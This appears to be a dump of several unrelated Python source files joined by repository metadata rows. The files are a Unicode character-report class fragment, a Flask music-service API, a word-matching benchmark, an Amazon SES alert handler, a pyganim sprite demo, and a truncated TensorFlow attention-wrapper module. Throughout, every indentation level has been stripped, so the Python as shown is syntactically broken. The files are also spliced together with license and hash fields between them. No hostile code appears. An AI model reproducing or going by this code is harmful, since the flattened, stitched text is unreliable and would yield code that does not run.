elif self.description:
out = '{}'.format(self.description)
elif self.unicode_point is not None:
out = '{}'.format(self.unicode_point)
if self.category is not None:
out += ' of category {}'.format(self.category)
if self.lineno is not None:
out += ' at line {}'.format(self.lineno)
elif self.colno is not None:
out += ' at column {}'.format(self.colno)
return out
@staticmethod
def make_pointer(line, colno):
out = ''
for idx in range(len(line)):
if idx == colno:
break
elif line[idx] == '\t':
out += '\t'
else:
out += '─'
return out + '⬏'
def __str__(self):
out = ''
if self.line is not None and self.colno is not None:
leading_ws = max(len(str(self.lineno)), 3)
tmpl = '{: <' + str(leading_ws) + 'd}: {}'
out += tmpl.format(self.lineno, self.line)
out += ' ' * leading_ws + ': '
out += self.make_pointer(self.line, self.colno)
out += '\n\n'
out += "{} ".format(self.character)
if self.unicode_point:
out += '{} '.format(self.unicode_point)
if self.lineno is not None and self.colno is not None:
out += '(line {}, col {})'.format(self.lineno, self.colno)
elif self.lineno is not None:
out += '(line {})'.format(self.lineno)
elif self.colno is not None:
out += '(col {})'.format(self.colno)
out += "\n"
if self.category:
out += " category: {}\n".format(self.category)
out += " name: {}\n".format(self.description)
out += "\n"
return out
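# Minimal usage sketch (all field values below are made up for illustration):
#
#     c = Character('é')
#     c.unicode_point = 'U+00E9'
#     c.lineno, c.colno = 3, 3
#     c.category = 'Ll'
#     c.description = 'LATIN SMALL LETTER E WITH ACUTE'
#     c.line = 'café = "open"'
#     print(c)              # full report with a pointer line under column 3
#     print(c.asciionly())  # one-line ASCII-only summary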
| bsd-3-clause | -7,909,865,003,349,707,000 | 30.135135 | 75 | 0.503906 | false |
building4theweb/soundem-api | soundem/views.py | 1 | 5875 | from flask import g, jsonify, request, abort
from flask_cors import cross_origin
from soundem import app
from .decorators import auth_token_required
from .models import Artist, Album, Song, User
@app.route('/api/v1/login', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def login():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
user = User.find_by_email(email)
if not user:
errors['email'] = 'User does not exist.'
elif not user.check_password(password):
errors['password'] = 'Invalid password.'
if errors:
return jsonify({'errors': errors}), 400
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data})
@app.route('/api/v1/register', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def register():
data = request.get_json() or {}
email = data.get('email')
password = data.get('password')
errors = {}
if not email:
errors['email'] = 'Field is required.'
if not password:
errors['password'] = 'Field is required.'
existing_user = User.find_by_email(email)
if existing_user:
errors['email'] = 'Email is already taken'
if errors:
return jsonify({'errors': errors}), 400
user = User.create(email=email, password=password)
user_data = {
'id': user.id,
'email': user.email,
'token': user.get_auth_token()
}
return jsonify({'user': user_data}), 201
@app.route('/api/v1/artists', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artists():
artists_results = []
for artist in Artist.get_all():
artists_results.append({
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
})
return jsonify({'artists': artists_results})
@app.route('/api/v1/artists/<int:artist_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_artist(artist_id):
artist = Artist.get(artist_id)
if not artist:
abort(404)
artist_data = {
'id': artist.id,
'name': artist.name,
'bio': artist.bio,
'albums': [album.id for album in artist.albums.all()]
}
return jsonify({'artist': artist_data})
@app.route('/api/v1/albums', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_albums():
albums_results = []
for album in Album.get_all():
albums_results.append({
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
})
return jsonify({'albums': albums_results})
@app.route('/api/v1/albums/<int:album_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_album(album_id):
album = Album.get(album_id)
if not album:
abort(404)
album_data = {
'id': album.id,
'name': album.name,
'artworkURL': album.artwork_url,
'artist': album.artist_id,
'songs': [song.id for song in album.songs.all()]
}
return jsonify({'album': album_data})
@app.route('/api/v1/songs', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def get_songs():
songs_results = []
favorite = request.args.get('favorite')
song_ids = request.args.getlist('ids[]')
if favorite == 'true':
songs = Song.get_favorites(g.user)
elif song_ids:
songs = Song.filter_by_ids(song_ids)
else:
songs = Song.get_all()
for song in songs:
songs_results.append({
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': song.is_favorited(g.user),
'duration': song.duration,
'url': song.url
})
return jsonify({'songs': songs_results})
@app.route('/api/v1/songs/<int:song_id>', methods=['GET', 'PUT'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def song(song_id):
song = Song.get(song_id)
is_favorited = None
if not song:
abort(404)
if request.method == 'PUT':
data = request.get_json() or {}
data_song = data.get('song') or {}
favorite = data_song.get('favorite')
if favorite is not None:
# Update song if favorite param was sent
is_favorited = song.set_favorite(g.user, favorite)
else:
song = Song.get(song_id)
if is_favorited is None:
# Check if song was favorited
is_favorited = song.is_favorited(g.user)
song_data = {
'id': song.id,
'name': song.name,
'album': song.album.id,
'favorite': is_favorited,
'duration': song.duration,
'url': song.url
}
return jsonify({'song': song_data})
@app.route('/api/v1/users/<int:user_id>', methods=['GET'])
@cross_origin(headers=['Content-Type', 'Authorization'])
@auth_token_required
def user(user_id):
user = g.user
if user.id != user_id:
abort(403)
user_data = {
'id': user.id,
'email': user.email,
'songTotal': Song.total_count(),
'albumTotal': Album.total_count(),
'durationTotal': Song.total_duration()
}
return jsonify({'user': user_data})
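# Example interaction with the endpoints above (hypothetical host and
# credentials; how the token is presented on later requests depends on the
# auth_token_required decorator defined in .decorators):
#
#     import requests
#     resp = requests.post('http://localhost:5000/api/v1/register',
#                          json={'email': '[email protected]', 'password': 'secret'})
#     token = resp.json()['user']['token']   # 201 on success
#     # The token is then used on protected endpoints such as
#     # GET /api/v1/songs?favorite=true and GET /api/v1/users/<id>.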
| mit | 6,891,862,848,539,757,000 | 24.323276 | 65 | 0.584 | false |
notkarol/banjin | experiment/python_word_matching_speed.py | 1 | 4650 | #!/usr/bin/python
# Takes in a dictionary of words
# Verifies that all functions return the same answers
# Generates random hands from the probability of getting tiles from the bunch
# Then prints out how long each function takes to find all matching words
# Generates various hand sizes to see if there's any scaling
import matplotlib.pyplot as plt
import numpy as np
import pickle
import os
import sys
import timeit
# Naive list way of matching wordbank
def f0_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i][i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_list(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if min(list(map(lambda x: x[1] - x[0], zip(wordbank[w_i], hand)))) >= 0:
results.append(w_i)
return results
# Naive way using numpy
def f0_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
match = True
for i in range(26):
if hand[i] < wordbank[w_i,i]:
match = False
break
if match:
results.append(w_i)
return results
# A for loop and some numpy
def f1_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if not np.any((hand - wordbank[w_i]) < 0):
results.append(w_i)
return results
# A for loop and some numpy
def f2_np(hand, wordbank):
results = []
for w_i in range(len(wordbank)):
if np.min(hand - wordbank[w_i]) >= 0:
results.append(w_i)
return results
# Vectorized sum and difference
def f3_np(hand, wordbank):
return np.where(np.sum((wordbank - hand) > 0, axis=1) == 0)[0]
# vectorized just using any
def f4_np(hand, wordbank):
return np.where(np.any(wordbank > hand, axis=1) == 0)[0]
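# Tiny illustration of the vectorized check in f4_np above: a word matches a
# hand exactly when no letter count in the word exceeds the hand's count.
#
#     hand = np.zeros(26); hand[[0, 2, 19]] = 1     # letters A, C, T
#     cat = np.zeros(26); cat[[0, 2, 19]] = 1       # "CAT"
#     dog = np.zeros(26); dog[[3, 6, 14]] = 1       # "DOG"
#     f4_np(hand, np.stack([cat, dog]))             # -> array([0]), only "CAT" fits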
# Prepare a 2D list and a 2D np array of letter frequencies
with open(sys.argv[1]) as f:
words = [x.split()[0] for x in f.readlines()]
wordbank_list = [[0] * 26 for _ in range(len(words))]
wordbank_np = np.zeros((len(words), 26))
for w_i in range(len(words)):
for letter in sorted(words[w_i]):
pos = ord(letter) - 65
wordbank_list[w_i][pos] += 1
wordbank_np[w_i][pos] += 1
# Arrays for keeping track of functions and data-specific wordbanks
hand_sizes = list(range(2, 9))
functions = {'list' : [f0_list, f1_list],
'numpy': [f0_np, f1_np, f2_np, f3_np, f4_np]}
wordbanks = {'list' : wordbank_list,
'numpy': wordbank_np}
n_iter = 10 if len(sys.argv) < 3 else int(sys.argv[2])
timings = {}
for datatype in functions:
timings[datatype] = np.zeros((max(hand_sizes) + 1, n_iter, len(functions[datatype])))
# Verify that our functions give the same answers
for datatype in functions:
for func in functions[datatype]:
print(datatype, func(wordbanks[datatype][len(wordbank_list) // 2], wordbanks[datatype]))
# Time each matching function on random hands of every size
imports = 'from __main__ import functions, wordbanks'
for counter in range(n_iter):
for hand_size in hand_sizes:
# Get a specific hand size
hand = [13,3,3,6,18,3,4,3,12,2,2,5,3,8,11,3,2,9,6,9,6,3,3,2,3,2]
while sum(hand) > hand_size:
pos = np.random.randint(sum(hand))
for i in range(len(hand)):
pos -= hand[i]
if pos < 0:
hand[i] -= 1
break
hand = str(hand)
# For this hand go wild
for datatype in functions:
for f_i in range(len(functions[datatype])):
cmd = 'functions["%s"][%i](%s, wordbanks["%s"])' % (datatype, f_i, hand, datatype)
timings[datatype][hand_size, counter, f_i] += timeit.timeit(cmd, imports, number=8)
print("\rCompleted %.1f%%" % (100 * (counter + 1) / n_iter), end='')
print()
# Save words and timings in case we're doing a long-lasting operation
filename = 'word_matching_timings_%s.pkl' % os.path.basename(sys.argv[1])
with open(filename, 'wb') as f:
print("Saving", filename)
pickle.dump((words, wordbanks, timings), f)
# Show Results
for datatype in functions:
means = np.mean(timings[datatype], axis=1)
for f_i in range(means.shape[1]):
plt.semilogy(hand_sizes, means[:, f_i][min(hand_sizes):], label='%s F%i' % (datatype, f_i))
plt.legend(loc='center left', bbox_to_anchor=(0.85, 0.5))
plt.xlabel("Hand Size")
plt.ylabel("Execution Time")
plt.title("Word Matching")
plt.show()
| mit | 6,223,729,968,353,600,000 | 29.794702 | 99 | 0.60043 | false |
cloudtools/nymms | nymms/reactor/handlers/ses_handler.py | 1 | 1939 | import logging
from nymms.reactor.handlers.Handler import Handler
from nymms.utils.aws_helper import ConnectionManager
from jinja2 import Template
from nymms.utils.templates import SimpleUndefined
logger = logging.getLogger(__name__)
class SESHandler(Handler):
""" A basic handler to send alerts to people via email through Amazon's
SES service. Sends every result it receives by default. To filter
results you should subclass this and provide a _filter method.
config options:
enabled: bool
region: string, aws region (us-east-1, etc)
sender: string, email address
subject_template: string
body_template: string
recipients: list, email addresses
filters: list, filters
"""
@property
def aws_conn(self):
if not getattr(self, '_aws_conn', None):
self._aws_conn = ConnectionManager(region=self.config['region'])
return self._aws_conn
def _send_email(self, result, previous_state):
subject = Template(self.config['subject_template'])
subject.environment.undefined = SimpleUndefined
body = Template(self.config['body_template'])
body.environment.undefined = SimpleUndefined
sender = self.config['sender']
recipients = self.config.get('recipients', [])
result_data = result.serialize()
if recipients:
logger.debug("Sending SES alert to %s as %s for %s.",
recipients, sender, result.id)
self.aws_conn.ses.send_email(
source=sender,
subject=subject.render(result_data),
body=body.render(result_data),
to_addresses=recipients)
else:
logger.debug("No valid recipients found, not sending email for "
"%s.", result.id)
def _process(self, result, previous_state):
self._send_email(result, previous_state)
| bsd-2-clause | -822,869,434,789,663,400 | 35.584906 | 76 | 0.638989 | false |
asweigart/pyganim | examples/sprite_sheet_demo.py | 1 | 1276 | # trex image from Wyverii on http://opengameart.org/content/unsealed-terrex
import sys
import os
sys.path.append(os.path.abspath('..'))
import pygame
from pygame.locals import *
import pyganim
pygame.init()
# set up the window
windowSurface = pygame.display.set_mode((320, 240), 0, 32)
pygame.display.set_caption('Sprite Sheet Demo')
# create the animation objects
rects = [( 0, 154, 94, 77),
( 94, 154, 94, 77),
(188, 154, 94, 77),
(282, 154, 94, 77),
(376, 154, 94, 77),
(470, 154, 94, 77),
(564, 154, 94, 77),
(658, 154, 94, 77),
(752, 154, 94, 77),]
allImages = pyganim.getImagesFromSpriteSheet('terrex_0.png', rects=rects)
frames = list(zip(allImages, [100] * len(allImages)))
dinoAnim = pyganim.PygAnimation(frames)
dinoAnim.play() # there is also a pause() and stop() method
mainClock = pygame.time.Clock()
BGCOLOR = (100, 50, 50)
while True:
windowSurface.fill(BGCOLOR)
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
dinoAnim.blit(windowSurface, (100, 50))
pygame.display.update()
mainClock.tick(30) # Feel free to experiment with any FPS setting. | bsd-3-clause | -1,025,960,563,565,159,800 | 27.377778 | 83 | 0.633229 | false |
Xeralux/tensorflow | tensorflow/contrib/seq2seq/python/ops/attention_wrapper.py | 1 | 59833 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A powerful dynamic attention wrapper object."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import math
import numpy as np
from tensorflow.contrib.framework.python.framework import tensor_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as layers_base
from tensorflow.python.layers import core as layers_core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.util import nest
__all__ = [
"AttentionMechanism",
"AttentionWrapper",
"AttentionWrapperState",
"LuongAttention",
"BahdanauAttention",
"hardmax",
"safe_cumprod",
"monotonic_attention",
"BahdanauMonotonicAttention",
"LuongMonotonicAttention",
]
_zero_state_tensors = rnn_cell_impl._zero_state_tensors # pylint: disable=protected-access
class AttentionMechanism(object):
@property
def alignments_size(self):
raise NotImplementedError
@property
def state_size(self):
raise NotImplementedError
def _prepare_memory(memory, memory_sequence_length, check_inner_dims_defined):
"""Convert to tensor and possibly mask `memory`.
Args:
memory: `Tensor`, shaped `[batch_size, max_time, ...]`.
memory_sequence_length: `int32` `Tensor`, shaped `[batch_size]`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
Returns:
A (possibly masked), checked, new `memory`.
Raises:
ValueError: If `check_inner_dims_defined` is `True` and not
`memory.shape[2:].is_fully_defined()`.
"""
memory = nest.map_structure(
lambda m: ops.convert_to_tensor(m, name="memory"), memory)
if memory_sequence_length is not None:
memory_sequence_length = ops.convert_to_tensor(
memory_sequence_length, name="memory_sequence_length")
if check_inner_dims_defined:
def _check_dims(m):
if not m.get_shape()[2:].is_fully_defined():
raise ValueError("Expected memory %s to have fully defined inner dims, "
"but saw shape: %s" % (m.name, m.get_shape()))
nest.map_structure(_check_dims, memory)
if memory_sequence_length is None:
seq_len_mask = None
else:
seq_len_mask = array_ops.sequence_mask(
memory_sequence_length,
maxlen=array_ops.shape(nest.flatten(memory)[0])[1],
dtype=nest.flatten(memory)[0].dtype)
seq_len_batch_size = (
memory_sequence_length.shape[0].value
or array_ops.shape(memory_sequence_length)[0])
def _maybe_mask(m, seq_len_mask):
rank = m.get_shape().ndims
rank = rank if rank is not None else array_ops.rank(m)
extra_ones = array_ops.ones(rank - 2, dtype=dtypes.int32)
m_batch_size = m.shape[0].value or array_ops.shape(m)[0]
if memory_sequence_length is not None:
message = ("memory_sequence_length and memory tensor batch sizes do not "
"match.")
with ops.control_dependencies([
check_ops.assert_equal(
seq_len_batch_size, m_batch_size, message=message)]):
seq_len_mask = array_ops.reshape(
seq_len_mask,
array_ops.concat((array_ops.shape(seq_len_mask), extra_ones), 0))
return m * seq_len_mask
else:
return m
return nest.map_structure(lambda m: _maybe_mask(m, seq_len_mask), memory)
def _maybe_mask_score(score, memory_sequence_length, score_mask_value):
if memory_sequence_length is None:
return score
message = ("All values in memory_sequence_length must greater than zero.")
with ops.control_dependencies(
[check_ops.assert_positive(memory_sequence_length, message=message)]):
score_mask = array_ops.sequence_mask(
memory_sequence_length, maxlen=array_ops.shape(score)[1])
score_mask_values = score_mask_value * array_ops.ones_like(score)
return array_ops.where(score_mask, score, score_mask_values)
class _BaseAttentionMechanism(AttentionMechanism):
"""A base AttentionMechanism class providing common functionality.
Common functionality includes:
1. Storing the query and memory layers.
2. Preprocessing and storing the memory.
"""
def __init__(self,
query_layer,
memory,
probability_fn,
memory_sequence_length=None,
memory_layer=None,
check_inner_dims_defined=True,
score_mask_value=None,
name=None):
"""Construct base AttentionMechanism class.
Args:
query_layer: Callable. Instance of `tf.layers.Layer`. The layer's depth
must match the depth of `memory_layer`. If `query_layer` is not
provided, the shape of `query` must match that of `memory_layer`.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
probability_fn: A `callable`. Converts the score and previous alignments
to probabilities. Its signature should be:
`probabilities = probability_fn(score, state)`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
memory_layer: Instance of `tf.layers.Layer` (may be None). The layer's
depth must match the depth of `query_layer`.
If `memory_layer` is not provided, the shape of `memory` must match
that of `query_layer`.
check_inner_dims_defined: Python boolean. If `True`, the `memory`
argument's shape is checked to ensure all but the two outermost
dimensions are fully defined.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
name: Name to use when creating ops.
"""
if (query_layer is not None
and not isinstance(query_layer, layers_base.Layer)):
raise TypeError(
"query_layer is not a Layer: %s" % type(query_layer).__name__)
if (memory_layer is not None
and not isinstance(memory_layer, layers_base.Layer)):
raise TypeError(
"memory_layer is not a Layer: %s" % type(memory_layer).__name__)
self._query_layer = query_layer
self._memory_layer = memory_layer
self.dtype = memory_layer.dtype
if not callable(probability_fn):
raise TypeError("probability_fn must be callable, saw type: %s" %
type(probability_fn).__name__)
if score_mask_value is None:
score_mask_value = dtypes.as_dtype(
self._memory_layer.dtype).as_numpy_dtype(-np.inf)
self._probability_fn = lambda score, prev: ( # pylint:disable=g-long-lambda
probability_fn(
_maybe_mask_score(score, memory_sequence_length, score_mask_value),
prev))
with ops.name_scope(
name, "BaseAttentionMechanismInit", nest.flatten(memory)):
self._values = _prepare_memory(
memory, memory_sequence_length,
check_inner_dims_defined=check_inner_dims_defined)
self._keys = (
self.memory_layer(self._values) if self.memory_layer # pylint: disable=not-callable
else self._values)
self._batch_size = (
self._keys.shape[0].value or array_ops.shape(self._keys)[0])
self._alignments_size = (self._keys.shape[1].value or
array_ops.shape(self._keys)[1])
@property
def memory_layer(self):
return self._memory_layer
@property
def query_layer(self):
return self._query_layer
@property
def values(self):
return self._values
@property
def keys(self):
return self._keys
@property
def batch_size(self):
return self._batch_size
@property
def alignments_size(self):
return self._alignments_size
@property
def state_size(self):
return self._alignments_size
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return a tensor of all zeros.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return _zero_state_tensors(max_time, batch_size, dtype)
def initial_state(self, batch_size, dtype):
"""Creates the initial state values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return the same output as initial_alignments.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A structure of all-zero tensors with shapes as described by `state_size`.
"""
return self.initial_alignments(batch_size, dtype)
def _luong_score(query, keys, scale):
"""Implements Luong-style (multiplicative) scoring function.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, call this function with `scale=True`.
Args:
query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
scale: Whether to apply a scale to the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
Raises:
ValueError: If `key` and `query` depths do not match.
"""
depth = query.get_shape()[-1]
key_units = keys.get_shape()[-1]
if depth != key_units:
raise ValueError(
"Incompatible or unknown inner dimensions between query and keys. "
"Query (%s) has units: %s. Keys (%s) have units: %s. "
"Perhaps you need to set num_units to the keys' dimension (%s)?"
% (query, depth, keys, key_units, key_units))
dtype = query.dtype
# Reshape from [batch_size, depth] to [batch_size, 1, depth]
# for matmul.
query = array_ops.expand_dims(query, 1)
# Inner product along the query units dimension.
# matmul shapes: query is [batch_size, 1, depth] and
# keys is [batch_size, max_time, depth].
# the inner product is asked to **transpose keys' inner shape** to get a
# batched matmul on:
# [batch_size, 1, depth] . [batch_size, depth, max_time]
# resulting in an output shape of:
# [batch_size, 1, max_time].
# we then squeeze out the center singleton dimension.
score = math_ops.matmul(query, keys, transpose_b=True)
score = array_ops.squeeze(score, [1])
if scale:
# Scalar used in weight scaling
g = variable_scope.get_variable(
"attention_g", dtype=dtype, initializer=1.)
score = g * score
return score
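# In equation form, the unnormalized Luong score computed above is
#     score[b, t] = sum_d query[b, d] * keys[b, t, d]
# optionally multiplied by the learned scalar g when scale=True.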
class LuongAttention(_BaseAttentionMechanism):
"""Implements Luong-style (multiplicative) attention scoring.
This attention has two forms. The first is standard Luong attention,
as described in:
Minh-Thang Luong, Hieu Pham, Christopher D. Manning.
"Effective Approaches to Attention-based Neural Machine Translation."
EMNLP 2015. https://arxiv.org/abs/1508.04025
The second is the scaled form inspired partly by the normalized form of
Bahdanau attention.
To enable the second form, construct the object with parameter
`scale=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="LuongAttention"):
"""Construct the AttentionMechanism mechanism.
Args:
num_units: The depth of the attention mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length: (optional) Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional) The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the memory layer of the attention mechanism.
name: Name to use when creating ops.
"""
# For LuongAttention, we only transform the memory layer; thus
# num_units **must** match expected the query depth.
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(LuongAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_attention", [query]):
score = _luong_score(query, self._keys, self._scale)
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
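# A minimal construction sketch (encoder_outputs, source_lengths, decoder_cell
# and decoder_depth are illustrative names, not part of this module):
#
#     attention_mechanism = LuongAttention(
#         num_units=decoder_depth,                # must match the query (decoder output) depth
#         memory=encoder_outputs,                 # [batch_size, max_time, ...]
#         memory_sequence_length=source_lengths)
#     cell = AttentionWrapper(decoder_cell, attention_mechanism)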
def _bahdanau_score(processed_query, keys, normalize):
"""Implements Bahdanau-style (additive) scoring function.
  This attention has two forms. The first is Bahdanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, set `normalize=True`.
Args:
processed_query: Tensor, shape `[batch_size, num_units]` to compare to keys.
keys: Processed memory, shape `[batch_size, max_time, num_units]`.
normalize: Whether to normalize the score function.
Returns:
A `[batch_size, max_time]` tensor of unnormalized score values.
"""
dtype = processed_query.dtype
# Get the number of hidden units from the trailing dimension of keys
num_units = keys.shape[2].value or array_ops.shape(keys)[2]
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
processed_query = array_ops.expand_dims(processed_query, 1)
v = variable_scope.get_variable(
"attention_v", [num_units], dtype=dtype)
if normalize:
# Scalar used in weight normalization
g = variable_scope.get_variable(
"attention_g", dtype=dtype,
initializer=math.sqrt((1. / num_units)))
# Bias added prior to the nonlinearity
b = variable_scope.get_variable(
"attention_b", [num_units], dtype=dtype,
initializer=init_ops.zeros_initializer())
# normed_v = g * v / ||v||
normed_v = g * v * math_ops.rsqrt(
math_ops.reduce_sum(math_ops.square(v)))
return math_ops.reduce_sum(
normed_v * math_ops.tanh(keys + processed_query + b), [2])
else:
return math_ops.reduce_sum(v * math_ops.tanh(keys + processed_query), [2])
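# Editorial sketch (not part of the original module; tensor values are made up):
# the additive score broadcasts a [batch, 1, units] query against [batch, time,
# units] keys, applies tanh, and reduces over the units axis with the learned
# vector v, giving one unnormalized score per memory position, shape [batch, time].
_example_keys = np.ones((1, 2, 3), dtype=np.float32)   # [batch, max_time, num_units]
_example_query = np.ones((1, 3), dtype=np.float32)     # [batch, num_units]
_example_v = np.ones(3, dtype=np.float32)               # stand-in for attention_v
_example_score = np.sum(
    _example_v * np.tanh(_example_keys + _example_query[:, None, :]), axis=2)
# _example_score has shape (1, 2): one score per memory time step.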
class BahdanauAttention(_BaseAttentionMechanism):
"""Implements Bahdanau-style (additive) attention.
This attention has two forms. The first is Bahdanau attention,
as described in:
Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio.
"Neural Machine Translation by Jointly Learning to Align and Translate."
ICLR 2015. https://arxiv.org/abs/1409.0473
The second is the normalized form. This form is inspired by the
weight normalization article:
Tim Salimans, Diederik P. Kingma.
"Weight Normalization: A Simple Reparameterization to Accelerate
Training of Deep Neural Networks."
https://arxiv.org/abs/1602.07868
To enable the second form, construct the object with parameter
`normalize=True`.
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
probability_fn=None,
score_mask_value=None,
dtype=None,
name="BahdanauAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
probability_fn: (optional) A `callable`. Converts the score to
probabilities. The default is @{tf.nn.softmax}. Other options include
@{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}.
Its signature should be: `probabilities = probability_fn(score)`.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
if probability_fn is None:
probability_fn = nn_ops.softmax
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = lambda score, _: probability_fn(score)
super(BahdanauAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
